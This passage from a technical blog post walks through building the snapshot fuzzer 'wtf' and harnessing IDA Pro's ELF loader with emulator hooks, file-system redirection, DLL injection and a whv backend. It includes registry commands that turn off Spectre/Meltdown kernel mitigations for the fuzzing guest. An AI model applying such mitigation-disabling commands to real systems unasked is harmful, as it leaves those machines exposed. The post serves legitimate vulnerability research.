StaticLinAccessHook; Hooks_.interrupt = StaticInterruptHook; Hooks_.exception = StaticExceptionHook; Hooks_.phy_access = StaticPhyAccessHook; Hooks_.tlb_cntrl = StaticTlbControlHook;  I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // // Keep track of new code coverage or log into the trace file. // const auto &Res = AggregatedCodeCoverage_.emplace(Rip); if (Res.second) { LastNewCoverage_.emplace(Rip); } // ... }  Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run: // // Lift off. // bochscpu_cpu_run(Cpu_, HookChain_);  Great, we're now pros and we can run some code! ## Building the basics In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful. Memory access facilities As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory. Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care. Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care. Instrumenting execution flow Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // ... // // Handle breakpoints. // if (Breakpoints_.contains(Rip)) { Breakpoints_.at(Rip)(this); } }  Handling infinite loop To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution: void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t, void *) { // // Keep track of the instructions executed. // RunStats_.NumberInstructionsExecuted++; // // Check the instruction limit. // if (InstructionLimit_ > 0 && RunStats_.NumberInstructionsExecuted > InstructionLimit_) { // // If we're over the limit, we stop the cpu. // BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n", InstructionLimit_); TestcaseResult_ = Timedout_t(); bochscpu_cpu_stop(Cpu_); } }  Tracking code coverage Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set: void BochscpuBackend_t::BeforeExecutionHook( /*void *Context, */ uint32_t, void *) { // // Grab the rip register off the cpu. // const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_)); // // Keep track of new code coverage or log into the trace file. // const auto &Res = AggregatedCodeCoverage_.emplace(Rip); if (Res.second) { LastNewCoverage_.emplace(Rip); }  Tracking dirty memory wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to. void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t, uint64_t VirtualAddress, uint64_t PhysicalAddress, uintptr_t Len, uint32_t, uint32_t MemAccess) { // ... // // If this is not a write access, we don't care to go further. // if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE && MemAccess != BOCHSCPU_HOOK_MEM_RW) { return; } // // Adding the physical address the set of dirty GPAs. // We don't use DirtyVirtualMemoryRange here as we need to // do a GVA->GPA translation which is a bit costly. // DirtyGpa(Gpa_t(PhysicalAddress)); }  Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy: bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) { // ... // // Restore physical memory. // uint8_t ZeroPage[Page::Size]; memset(ZeroPage, 0, sizeof(ZeroPage)); for (const auto DirtyGpa : DirtyGpas_) { const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64()); // // As we allocate physical memory pages full of zeros when // the guest tries to access a GPA that isn't present in the dump, // we need to be able to restore those. It's easy, if the Hva is nullptr, // we point it to a zero page. // if (Hva == nullptr) { Hva = ZeroPage; } bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size); } // // Empty the set. // DirtyGpas_.clear(); // ... return true; }  Generic mutators I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's. class LibfuzzerMutator_t { using CustomMutatorFunc_t = decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator); fuzzer::Random Rand_; fuzzer::MutationDispatcher Mut_; std::unique_ptr<fuzzer::Unit> CrossOverWith_; public: explicit LibfuzzerMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void RegisterCustomMutator(const CustomMutatorFunc_t F); void SetCrossOverWith(const Testcase_t &Testcase); }; class HonggfuzzMutator_t { honggfuzz::dynfile_t DynFile_; honggfuzz::honggfuzz_t Global_; std::mt19937_64 &Rng_; honggfuzz::run_t Run_; public: explicit HonggfuzzMutator_t(std::mt19937_64 &Rng); size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize); void SetCrossOverWith(const Testcase_t &Testcase); };  Corpus store Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory. The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.  // // If the coverage size has changed, it means that this testcase // provided new coverage indeed. // const bool NewCoverage = Coverage_.size() > SizeBefore; if (NewCoverage) { // // Allocate a test that will get moved into the corpus and maybe // saved on disk. // Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(), ReceivedTestcase.size()); // // Before moving the buffer into the corpus, set up cross over with // it. // Mutator_->SetCrossOverWith(Testcase); // // Ready to move the buffer into the corpus now. // Corpus_.SaveTestcase(Result, std::move(Testcase)); } } // [...] // // If we get here, it means that we are ready to mutate. // First thing we do is to grab a seed. // const Testcase_t *Testcase = Corpus_.PickTestcase(); if (!Testcase) { fmt::print("The corpus is empty, exiting\n"); std::abort(); } // // If the testcase is too big, abort as this should not happen. // if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) { fmt::print( "The testcase buffer len is bigger than the testcase buffer max " "size.\n"); std::abort(); } // // Copy the input in a buffer we're going to mutate. // memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(), Testcase->BufferSize_); // // Mutate in the scratch buffer. // const size_t TestcaseBufferSize = Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_, Opts_.TestcaseBufferMaxSize); // // Copy the testcase in its own buffer before sending it to the // consumer. // TestcaseContent.resize(TestcaseBufferSize); memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);  Detecting context switches Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed: void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t, uint32_t What, uint64_t NewCrValue) { // // We only care about CR3 changes. // if (What != BOCHSCPU_HOOK_TLB_CR3) { return; } // // And we only care about it when the CR3 value is actually different from // when we started the testcase. // if (NewCrValue == InitialCr3_) { return; } // // Stop the cpu as we don't want to be context-switching. // BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n", NewCrValue); BochsHooksDebugPrint("Stopping cpu.\n"); TestcaseResult_ = Cr3Change_t(); bochscpu_cpu_stop(Cpu_); }  Debug symbols Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc. This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does. Trace generation The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating. Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc. Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case. Crash detection The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure. # Harnessing IDA: walking barefoot into the desert Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance. I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier: • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses, • The -B option allows running IDA in batch-mode from the command line, • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around. Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood. ## Inserting test case After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc. To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either. I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc. This is an example of what this layer allowed me to do: bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) { // // Those files are files we want to redirect to host files. When there is // a hooked i/o targeted to one of them, we deliver the i/o on the host // by calling the appropriate syscalls and proxy back the result to the // guest. // const std::vector<std::u16string> GuestFiles = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"}; for (const auto &GuestFile : GuestFiles) { const size_t LastSlash = GuestFile.find_last_of(uR"(\)"); if (LastSlash == GuestFile.npos) { fmt::print("Expected a / in {}\n", u16stringToString(GuestFile)); return false; } const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1); const fs::path HostFile(GuestFilesPath / GuestFilename); size_t BufferSize = 0; const auto Buffer = ReadFile(HostFile, BufferSize); if (Buffer == nullptr || BufferSize == 0) { fmt::print("Expected to find {}.\n", HostFile.string()); return false; } g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(), BufferSize); } g_FsHandleTable.MapExistingWriteableGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id0)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id1)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.nam)"); g_FsHandleTable.MapNonExistingGuestFile( uR"(\??\C:\Users\over\Desktop\wtf_input.id2)"); // // Those files are files we want to pretend that they don't exist in the // guest. // const std::vector<std::u16string> NotFounds = { uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)", uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)", uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)", uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"}; for (const std::u16string &NotFound : NotFounds) { g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str()); } g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) { // \ids\pc\api-ms-win-core-profile-l1-1-0.idt // \ids\api-ms-win-core-profile-l1-1-0.idt // \sig\pc\vc64seh.sig // \til\pc\gnulnx_x64.til // 6ba8075c8f243566350f741c7d6e9318089add.debug const bool IsIdt = Path.ends_with(u".idt"); const bool IsIds = Path.ends_with(u".ids"); const bool IsSig = Path.ends_with(u".sig"); const bool IsTil = Path.ends_with(u".til"); const bool IsDebug = Path.ends_with(u".debug"); const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug; if (Blacklisted) { return true; } // // The parser can invoke ida64!import_module to have the user select // a file that gets imported by the binary currently analyzed. This is // fine if the import directory is well formated, when it's not it // potentially uses garbage in the file as a path name. Strategy here // is to block the access if the path is not ASCII. // for (const auto &C : Path) { if (isascii(C)) { continue; } DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path)); return true; } return false; }); return true; }  Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them. Problem 1: Pre-load dlls For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem. This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs. Problem 2: Paged-out memory On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o. I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem: set BASE_DIR=C:\Program Files\IDA Pro 7.5 set PLUGINS_DIR=%BASE_DIR%\plugins set LOADERS_DIR=%BASE_DIR%\loaders set PROCS_DIR=%BASE_DIR%\procs set NTSD=C:\Users\over\Desktop\x64\ntsd.exe REM Remove a bunch of plugins del "%PLUGINS_DIR%\python.dll" del "%PLUGINS_DIR%\python64.dll" [...] REM Turning on PH REM 02000000 Enable page heap (full page heap) reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f REM This is useful to disable stack-traces reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA) set IDA_NO_HISTORY=1 REM Set up headless mode and run IDA set TVHEADLESS=1 REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input REM bp ida64!init_database REM Bump suspend count: ~0n REM Detach: qd REM Find process, set ba e1 on address from kdbg REM ntsd -pn ida64.exe ; fix suspend count: ~0m REM should break. REM Inject the dlls. inject.exe ida64.exe "%PLUGINS_DIR%" inject.exe ida64.exe "%LOADERS_DIR%" inject.exe ida64.exe "%PROCS_DIR%" inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll" REM Lock everything lockmem.exe ida64.exe REM You can now reattach; and ~0m to bump down the suspend count %NTSD% -pn ida64.exe  Problem 3: Manually soft page-fault in memory from hooks To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked. To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile: if (!g_Backend->SetBreakpoint( "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) { // NTSTATUS NtQueryAttributesFile( // _In_ POBJECT_ATTRIBUTES ObjectAttributes, // _Out_ PFILE_BASIC_INFORMATION FileInformation //); // ... // // Ensure that the GuestFileInformation is faulted-in memory. // if (GuestFileInformation && Backend->PageFaultsMemoryIfNeeded( GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) { return; }  Problem 4: KVA shadow When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation. To solve this I simply disabled KVA shadow with the below edits in the registry: REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown) REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f  Problem 5: Identifying bottlenecks While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change. For example, below is the V-Tune hotspot analysis report for the below invocation: wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0  This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow. ## The birth of hope After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information: >wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g Initializing the debugger instance.. (this takes a bit of time) Parsing coverage\dwarf64.cov.. Parsing coverage\elf64.cov.. Parsing coverage\libdwarf.cov.. Applied 43624 code coverage breakpoints [...] Running ntfs-3g [...] ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll) ida64: ida64!msg(format="Possible file format: %s (%s) ", ...) ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object) [...] ida64: ida64!msg(format=" bytes pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...) ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u total memory allocated ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll) [...] ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...) ida64: ida64!msg(format="Loading processor module %s for %s...", ...) ida64: ida64!msg(format="Initializing processor module %s...", ...) ida64: ida64!msg(format="OK ", ...) ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%s -> %s ", ...) [...] ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Reading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="Loading symbols", ...) ida64: ida64!msg(format="%3d. Creating a new segment (%08a-%08a) ...", ...) ida64: ida64!msg(format=" ... OK ", ...) ida64: ida64!mbox(format="", ...) ida64: ida64!msg(format="Processing relocations... ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...) ida64: ida64!msg(format="%s -> %s ", ...) ida64: Unexpected entries in the PLT stub. The file might have been modified after linking. ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) [...] ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll) ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="%s", ...) ida64: ida64!msg(format="no. ", ...) ida64: ida64!msg(format="Plugin "%s" not found ", ...) ida64: Hit the end of load file :o  # Need for speed: whv backend At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend. I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals. Code coverage What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for. It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools. Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag. The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu. Dirty memory The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect. Tracing One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future. Timeout To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with: class TimerQ_t { HANDLE TimerQueue_ = nullptr; HANDLE LastTimer_ = nullptr; static void CALLBACK AlarmHandler(PVOID, BOOLEAN) { reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor(); } public: ~TimerQ_t() { if (TimerQueue_) { DeleteTimerQueueEx(TimerQueue_, nullptr); } } TimerQ_t() = default; TimerQ_t(const TimerQ_t &) = delete; TimerQ_t &operator=(const TimerQ_t &) = delete; void SetTimer(const uint32_t Seconds) { if (Seconds == 0) { return; } if (!TimerQueue_) { TimerQueue_ = CreateTimerQueue(); if (!TimerQueue_) { fmt::print("CreateTimerQueue failed.\n"); exit(1); } } if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler, nullptr, Seconds * 1000, Seconds * 1000, 0)) { fmt::print("CreateTimerQueueTimer failed.\n"); exit(1); } } void TerminateLastTimer() { DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr); } };  Inserting page faults To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type: bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva, const uint64_t Size) { const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size); // // If we haven't found any GVA to fault-in then we have no job to do so we // return. // if (PageToFault == Gva_t(0xffffffffffffffff)) { return false; } WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault); // cf 'VM-Entry Controls for Event Injection' in Intel 3C WHV_REGISTER_VALUE_t Exception; Exception->ExceptionEvent.EventPending = 1; Exception->ExceptionEvent.EventType = WHvX64PendingEventException; Exception->ExceptionEvent.DeliverErrorCode = 1; Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault; Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser; Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64(); if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) { __debugbreak(); } return true; }  Determinism The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv. I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation: // // Make ExGenRandom deterministic. // // kd> ub fffff8053b8287c4 l1 // nt!ExGenRandom+0xe0: // fffff8053b8287c0 480fc7f2 rdrand rdx const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4); if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) { DebugPrint("Hit 